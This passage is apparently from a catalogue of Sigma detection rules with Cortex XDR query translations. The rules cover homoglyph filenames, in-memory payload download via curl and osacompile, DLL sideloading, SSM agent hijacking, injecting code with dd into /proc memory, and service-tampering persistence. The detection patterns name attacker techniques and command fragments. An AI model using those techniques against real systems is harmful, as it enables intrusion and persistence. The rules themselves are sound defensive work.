 ((action_file_name in ("*А*", "*В*", "*Е*", "*К*", "*М*", "*Н*", "*О*", "*Р*", "*С*", "*Т*", "*Х*", "*Ѕ*", "*І*", "*Ј*", "*Ү*", "*Ӏ*", "*Ԍ*", "*Ԛ*", "*Ԝ*", "*Α*", "*Β*", "*Ε*", "*Ζ*", "*Η*", "*Ι*", "*Κ*", "*Μ*", "*Ν*", "*Ο*", "*Ρ*", "*Τ*", "*Υ*", "*Χ*")) or 
 (action_file_name in ("*а*", "*е*", "*о*", "*р*", "*с*", "*х*", "*ѕ*", "*і*", "*ӏ*", "*ј*", "*һ*", "*ԁ*", "*ԛ*", "*ԝ*", "*ο*"))))

view Sigma YAML

title: Potential Homoglyph Attack Using Lookalike Characters in Filename
id: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6
status: test
description: |
    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
    This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
references:
    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish
    - http://www.irongeek.com/homoglyph-attack-generator.php
author: Micah Babinski, @micahbabinski
date: 2023-05-08
tags:
    - attack.stealth
    - attack.t1036
    - attack.t1036.003
logsource:
    category: file_event
    product: windows
detection:
    selection_upper:
        TargetFilename|contains:
            - "\u0410" # А/A
            - "\u0412" # В/B
            - "\u0415" # Е/E
            - "\u041a" # К/K
            - "\u041c" # М/M
            - "\u041d" # Н/H
            - "\u041e" # О/O
            - "\u0420" # Р/P
            - "\u0421" # С/C
            - "\u0422" # Т/T
            - "\u0425" # Х/X
            - "\u0405" # Ѕ/S
            - "\u0406" # І/I
            - "\u0408" # Ј/J
            - "\u04ae" # Ү/Y
            - "\u04c0" # Ӏ/I
            - "\u050C" # Ԍ/G
            - "\u051a" # Ԛ/Q
            - "\u051c" # Ԝ/W
            - "\u0391" # Α/A
            - "\u0392" # Β/B
            - "\u0395" # Ε/E
            - "\u0396" # Ζ/Z
            - "\u0397" # Η/H
            - "\u0399" # Ι/I
            - "\u039a" # Κ/K
            - "\u039c" # Μ/M
            - "\u039d" # Ν/N
            - "\u039f" # Ο/O
            - "\u03a1" # Ρ/P
            - "\u03a4" # Τ/T
            - "\u03a5" # Υ/Y
            - "\u03a7" # Χ/X
    selection_lower:
        TargetFilename|contains:
            - "\u0430" # а/a
            - "\u0435" # е/e
            - "\u043e" # о/o
            - "\u0440" # р/p
            - "\u0441" # с/c
            - "\u0445" # х/x
            - "\u0455" # ѕ/s
            - "\u0456" # і/i
            - "\u04cf" # ӏ/l
            - "\u0458" # ј/j
            - "\u04bb" # һ/h
            - "\u0501" # ԁ/d
            - "\u051b" # ԛ/q
            - "\u051d" # ԝ/w
            - "\u03bf" # ο/o
    condition: 1 of selection_*
falsepositives:
    - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential In-Memory Download And Compile Of Payloads

Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware

status test author Sohan G (D4rkCiph3r), Red Canary (idea) ATT&CK sub-technique id 13db8d2e-7723-4c2c-93c1-a4d36994f7ef

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_MAC and 
 (action_process_image_command_line contains "osacompile" and 
 action_process_image_command_line contains "curl"))

view Sigma YAML

title: Potential In-Memory Download And Compile Of Payloads
id: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef
status: test
description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
references:
    - https://redcanary.com/blog/mac-application-bundles/
author: Sohan G (D4rkCiph3r), Red Canary (idea)
date: 2023-08-22
tags:
    - attack.command-and-control
    - attack.execution
    - attack.t1059.007
    - attack.t1105
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        CommandLine|contains|all:
            - 'osacompile'
            - 'curl'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Initial Access via DLL Search Order Hijacking

Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.

status test author Tim Rauch (rule), Elastic (idea) ATT&CK sub-technique id dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c

cortex_xdr query

config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((actor_process_image_path in ("*\winword.exe", "*\excel.exe", "*\powerpnt.exe", "*\MSACCESS.EXE", "*\MSPUB.EXE", "*\fltldr.exe", "*\cmd.exe", "*\certutil.exe", "*\mshta.exe", "*\cscript.exe", "*\wscript.exe", "*\curl.exe", "*\powershell.exe", "*\pwsh.exe")) and 
 action_file_name contains ".dll" and 
 (action_file_name contains "\Users\" and 
 action_file_name contains "\AppData\") and 
 (action_file_name in ("*\Microsoft\OneDrive\*", "*\Microsoft OneDrive\*", "*\Microsoft\Teams\*", "*\Local\slack\app-*", "*\Local\Programs\Microsoft VS Code\*"))) and 
 (not 
 (actor_process_image_path contains "\cmd.exe" and 
 (action_file_name contains "\Users\" and 
 action_file_name contains "\AppData\" and 
 action_file_name contains "\Microsoft\OneDrive\" and 
 action_file_name contains "\api-ms-win-core-")))))

view Sigma YAML

title: Potential Initial Access via DLL Search Order Hijacking
id: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c
status: test
description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc
    - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-21
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1566
    - attack.t1566.001
    - attack.initial-access
    - attack.t1574
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # add more processes when you find them
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\MSACCESS.EXE'
            - '\MSPUB.EXE'
            - '\fltldr.exe'
            - '\cmd.exe'
            - '\certutil.exe'
            - '\mshta.exe'
            - '\cscript.exe'
            - '\wscript.exe'
            - '\curl.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
        TargetFilename|endswith: '.dll'
        TargetFilename|contains|all:
            - '\Users\'
            - '\AppData\'
        TargetFilename|contains:
            # add more suspicious paths when you find them
            - '\Microsoft\OneDrive\'
            - '\Microsoft OneDrive\'
            - '\Microsoft\Teams\'
            - '\Local\slack\app-'
            - '\Local\Programs\Microsoft VS Code\'
    filter:
        Image|endswith: '\cmd.exe'
        TargetFilename|contains|all:
            - '\Users\'
            - '\AppData\'
            - '\Microsoft\OneDrive\'
            - '\api-ms-win-core-'
    condition: selection and not filter
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential KamiKakaBot Activity - Lure Document Execution

Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.

status test author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) ATT&CK technique id 24474469-bd80-46cc-9e08-9fbe81bfaaca

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\cmd.exe" and 
 (action_process_image_command_line contains "/c " and 
 action_process_image_command_line contains ".lnk ~" and 
 action_process_image_command_line contains "Start Menu\Programs\Word") and 
 action_process_image_command_line contains ".doc"))

view Sigma YAML

title: Potential KamiKakaBot Activity - Lure Document Execution
id: 24474469-bd80-46cc-9e08-9fbe81bfaaca
status: test
description: |
    Detects the execution of a Word document via the WinWord Start Menu shortcut.
    This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
references:
    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-03-22
tags:
    - attack.execution
    - attack.t1059
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - '/c '
            - '.lnk ~'
            - 'Start Menu\Programs\Word'
        CommandLine|endswith: '.doc'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential KamiKakaBot Activity - Shutdown Schedule Task Creation

Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.

status test author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) ATT&CK tactic-only id fe9e8ba9-4419-41e6-a574-bd9f7b3af961

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\schtasks.exe" and 
 (action_process_image_command_line contains " /create " and 
 action_process_image_command_line contains "shutdown /l /f" and 
 action_process_image_command_line contains "WEEKLY")) and 
 (not 
 (action_process_username in ("*AUTHORI*", "*AUTORI*")))))

view Sigma YAML

title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
id: fe9e8ba9-4419-41e6-a574-bd9f7b3af961
status: test
description: |
    Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
    This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
references:
    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
    - https://tria.ge/240123-rapteaahhr/behavioral1
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-03-22
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:
            - ' /create '
            - 'shutdown /l /f'
            - 'WEEKLY'
    filter_main_system_user:
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Lateral Movement via Windows Remote Shell

Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.

status experimental author Liran Ravich ATT&CK sub-technique id 79df3f68-dccb-48e9-9171-b75cbc37c51d

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\winrshost.exe" and 
 (not 
 action_process_image_path = "C:\Windows\System32\conhost.exe")))

view Sigma YAML

title: Potential Lateral Movement via Windows Remote Shell
id: 79df3f68-dccb-48e9-9171-b75cbc37c51d
status: experimental
description: |
    Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
references:
    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/
    - https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement
author: Liran Ravich
date: 2025-10-22
tags:
    - attack.lateral-movement
    - attack.t1021.006
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: Example of command to simulate (winrm needs to be enabled): "c:\Windows\System32\winrs.exe" powershell
        ParentImage|endswith: '\winrshost.exe'
    filter_main_conhost:
        Image: 'C:\Windows\System32\conhost.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate use of WinRM within the organization
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Libvlc.DLL Sideloading

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

status test author X__Junior ATT&CK sub-technique id bf9808c4-d24f-44a2-8398-b65227d406b6

cortex_xdr query

config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\libvlc.dll" and 
 (not 
 (action_module_path in ("C:\Program Files (x86)\VideoLAN\VLC\*", "C:\Program Files\VideoLAN\VLC\*")))))

view Sigma YAML

title: Potential Libvlc.DLL Sideloading
id: bf9808c4-d24f-44a2-8398-b65227d406b6
status: test
description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
references:
    - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html
    - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html
author: X__Junior
date: 2023-04-17
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\libvlc.dll'
    filter_main_vlc:
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\VideoLAN\VLC\'
            - 'C:\Program Files\VideoLAN\VLC\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - False positives are expected if VLC is installed in non-default locations
level: medium

Convert to SIEM query

medium Strong High FP

Potential Linux Amazon SSM Agent Hijacking

Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.

status test author Muhammad Faisal ATT&CK sub-technique id f9b3edc5-3322-4fc7-8aa3-245d646cc4b7

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/amazon-ssm-agent" and 
 (action_process_image_command_line contains "-register " and 
 action_process_image_command_line contains "-code " and 
 action_process_image_command_line contains "-id " and 
 action_process_image_command_line contains "-region ")))

view Sigma YAML

title: Potential Linux Amazon SSM Agent Hijacking
id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7
status: test
description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
references:
    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/
    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
author: Muhammad Faisal
date: 2023-08-03
tags:
    - attack.command-and-control
    - attack.persistence
    - attack.t1219.002
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/amazon-ssm-agent'
        CommandLine|contains|all:
            - '-register '
            - '-code '
            - '-id '
            - '-region '
    condition: selection
falsepositives:
    - Legitimate activity of system administrators
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Linux Process Code Injection Via DD Utility

Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.

status test author Joseph Kamau ATT&CK sub-technique id 4cad6c64-d6df-42d6-8dae-eb78defdc415

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/dd" and 
 (action_process_image_command_line contains "of=" and 
 action_process_image_command_line contains "/proc/" and 
 action_process_image_command_line contains "/mem")))

view Sigma YAML

title: Potential Linux Process Code Injection Via DD Utility
id: 4cad6c64-d6df-42d6-8dae-eb78defdc415
status: test
description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
references:
    - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/
    - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh
author: Joseph Kamau
date: 2023-12-01
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.009
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/dd'
        CommandLine|contains|all:
            - 'of='
            - '/proc/'
            - '/mem'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE

Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.

status test author @kostastsale ATT&CK technique id 39ac1fb0-07f1-474b-b97e-c5c0eace0d79

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\w3wp.exe" and 
 actor_process_command_line contains "moveitdmz pool" and 
 action_process_image_path contains "\csc.exe"))

view Sigma YAML

title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
id: 39ac1fb0-07f1-474b-b97e-c5c0eace0d79
status: test
description: |
    Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.

    MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.

    Hunting Opportunity

    Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
references:
    - https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
    - https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/
author: '@kostastsale'
date: 2023-06-01
tags:
    - attack.execution
    - attack.t1059
    - cve.2023-34362
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\w3wp.exe'
        ParentCommandLine|contains: 'moveitdmz pool'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Initial software installation and software updates.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Mfdetours.DLL Sideloading

Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id d2605a99-2218-4894-8fd3-2afb7946514d

cortex_xdr query

config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\mfdetours.dll" and 
 (not 
 action_module_path contains ":\Program Files (x86)\Windows Kits\10\bin\")))

view Sigma YAML

title: Potential Mfdetours.DLL Sideloading
id: d2605a99-2218-4894-8fd3-2afb7946514d
status: test
description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-03
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\mfdetours.dll'
    filter_main_legit_path:
        ImageLoaded|contains: ':\Program Files (x86)\Windows Kits\10\bin\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Mftrace.EXE Abuse

Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 actor_process_image_path contains "\mftrace.exe")

view Sigma YAML

title: Potential Mftrace.EXE Abuse
id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e
status: test
description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-09
modified: 2023-08-03
tags:
    - attack.execution
    - attack.stealth
    - attack.t1127
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\mftrace.exe'
    condition: selection
falsepositives:
    - Legitimate use for tracing purposes
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

status test author Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id ba1f7802-adc7-48b4-9ecb-81e227fddfd5

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\tshark.exe" and 
 action_process_image_command_line contains "-i") or 
 action_process_image_path contains "\windump.exe"))

view Sigma YAML

title: Potential Network Sniffing Activity Using Network Tools
id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5
status: test
description: |
    Detects potential network sniffing via use of network tools such as "tshark", "windump".
    Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
    An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-21
modified: 2023-02-20
tags:
    - attack.credential-access
    - attack.discovery
    - attack.t1040
logsource:
    category: process_creation
    product: windows
detection:
    selection_tshark:
        Image|endswith: '\tshark.exe'
        CommandLine|contains: '-i'
    selection_windump:
        Image|endswith: '\windump.exe'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration activity to troubleshoot network issues
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential PendingFileRenameOperations Tampering

Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.

status test author frack113 ATT&CK sub-technique id 4eec988f-7bf0-49f1-8675-1e6a510b3a2a

cortex_xdr query

config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations" and 
 (actor_process_image_path contains "\Users\Public\" or 
 (actor_process_image_path in ("*\reg.exe", "*\regedit.exe")))))

view Sigma YAML

title: Potential PendingFileRenameOperations Tampering
id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a
status: test
description: |
    Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
references:
    - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6
    - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN
    - https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html
    - https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
author: frack113
date: 2023-01-27
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1036.003
logsource:
    category: registry_set
    product: windows
detection:
    selection_main:
        TargetObject|contains: '\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations'
    selection_susp_paths:
        Image|contains: '\Users\Public\'
            # - '\AppData\Local\Temp\'  # Commented out as it's used by legitimate installers
    selection_susp_images:
        Image|endswith:
            - '\reg.exe'
            - '\regedit.exe'
    condition: selection_main and 1 of selection_susp_*
falsepositives:
    - Installers and updaters may set currently in use files for rename or deletion after a reboot.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 15904280-565c-4b73-9303-3291f964e7f9

cortex_xdr query

config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_file_name contains "\WINDOWS\Setup\Scripts\ErrorHandler.cmd")

view Sigma YAML

title: Potential Persistence Attempt Via ErrorHandler.Cmd
id: 15904280-565c-4b73-9303-3291f964e7f9
status: test
description: |
    Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
    The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
references:
    - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
    - https://github.com/last-byte/PersistenceSniper
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-09
modified: 2022-12-19
tags:
    - attack.persistence
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\WINDOWS\Setup\Scripts\ErrorHandler.cmd'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Persistence Attempt Via Existing Service Tampering

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

status test author Sreeman ATT&CK sub-technique id 38879043-7e1e-47a9-8d46-6bec88e201df

cortex_xdr query

config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((action_process_image_command_line contains "sc " and 
 action_process_image_command_line contains "config " and 
 action_process_image_command_line contains "binpath=") or 
 (action_process_image_command_line contains "sc " and 
 action_process_image_command_line contains "failure" and 
 action_process_image_command_line contains "command=")) or 
 (((action_process_image_command_line contains "reg " and 
 action_process_image_command_line contains "add " and 
 action_process_image_command_line contains "FailureCommand") or 
 (action_process_image_command_line contains "reg " and 
 action_process_image_command_line contains "add " and 
 action_process_image_command_line contains "ImagePath")) and 
 (action_process_image_command_line in ("*.sh*", "*.exe*", "*.dll*", "*.bin$*", "*.bat*", "*.cmd*", "*.js*", "*.msh$*", "*.reg$*", "*.scr*", "*.ps*", "*.vb*", "*.jar*", "*.pl*")))))

view Sigma YAML

title: Potential Persistence Attempt Via Existing Service Tampering
id: 38879043-7e1e-47a9-8d46-6bec88e201df
status: test
description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
references:
    - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/
author: Sreeman
date: 2020-09-29
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1543.003
    - attack.t1574.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_sc:
        - CommandLine|contains|all:
              - 'sc '
              - 'config '
              - 'binpath='
        - CommandLine|contains|all:
              - 'sc '
              - 'failure'
              - 'command='
    selection_reg_img:
        - CommandLine|contains|all:
              - 'reg '
              - 'add '
              - 'FailureCommand'
        - CommandLine|contains|all:
              - 'reg '
              - 'add '
              - 'ImagePath'
    selection_reg_ext:
        CommandLine|contains:
            - '.sh'
            - '.exe'
            - '.dll'
            - '.bin$'
            - '.bat'
            - '.cmd'
            - '.js'
            - '.msh$'
            - '.reg$'
            - '.scr'
            - '.ps'
            - '.vb'
            - '.jar'
            - '.pl'
    condition: selection_sc or all of selection_reg_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong High FP

Potential Persistence Attempt Via Run Keys Using Reg.EXE

